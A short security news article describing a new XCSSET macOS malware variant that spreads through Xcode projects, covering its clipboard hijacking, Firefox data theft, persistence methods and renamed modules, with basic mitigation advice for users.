XCSSET macOS Malware
Cybersecurity researchers have identified a new, more sophisticated variant of the XCSSET malware targeting Apple macOS. While currently observed in limited attacks, this updated version demonstrates significant enhancements in stealth, persistence, and data exfiltration.
Table of Contents
What Makes This Variant Different?
The latest XCSSET version introduces several key changes:
Browser and Clipboard Targeting: It now monitors clipboard content for cryptocurrency wallet addresses, replacing them with attacker-controlled addresses to hijack transactions.
Expanded Data Theft: Beyond Safari, the malware can now exfiltrate data from Mozilla Firefox.
Stealth and Persistence: Using run-only compiled AppleScripts and LaunchDaemon entries, it remains difficult to detect and maintain persistence on infected systems.
Improved Infection Chain: Changes to the fourth stage of the attack involve fetching a final-stage AppleScript responsible for system information collection and module execution via a boot() function.
How XCSSET Infects macOS
XCSSET primarily targets Xcode projects used by software developers. When these projects are built, the malware activates and executes its malicious modules. While the exact distribution method is unclear, it is suspected that shared or cloned Xcode projects are a major vector.
Earlier this year, researchers noted enhancements including better error handling and the implementation of three persistence techniques designed to siphon sensitive data from compromised systems.
New and Updated Modules
The latest variant features several new or modified modules, each performing specific malicious functions:
vexyeqj (formerly seizecj)
- Downloads a module named bnk using osascript.
- Handles data validation, encryption/decryption, C2 communication, and logging.
- Incorporates clipboard hijacking capabilities.
neq_cdyd_ilvcmwx
- Exfiltrates files to the C2 server, similar to the older txzx_vostfdi module.
xmyyeqjx
- Establishes LaunchDaemon-based persistence.
jey
- Implements Git-based persistence.
iewmilh_cdyd
- Steals Firefox browser data using a modified HackBrowserData tool.
Additional updates include checks for the Telegram messaging app and logic modifications across various modules.
Mitigation and Safety Measures
To reduce the risk posed by XCSSET, macOS users should:
- Keep their systems and software fully updated.
- Carefully inspect Xcode projects obtained from repositories or external sources.
- Be cautious when copying or pasting sensitive information, especially cryptocurrency wallet addresses.
This structured format highlights the malware’s evolution, technical details, and practical mitigation advice while keeping all essential information intact.
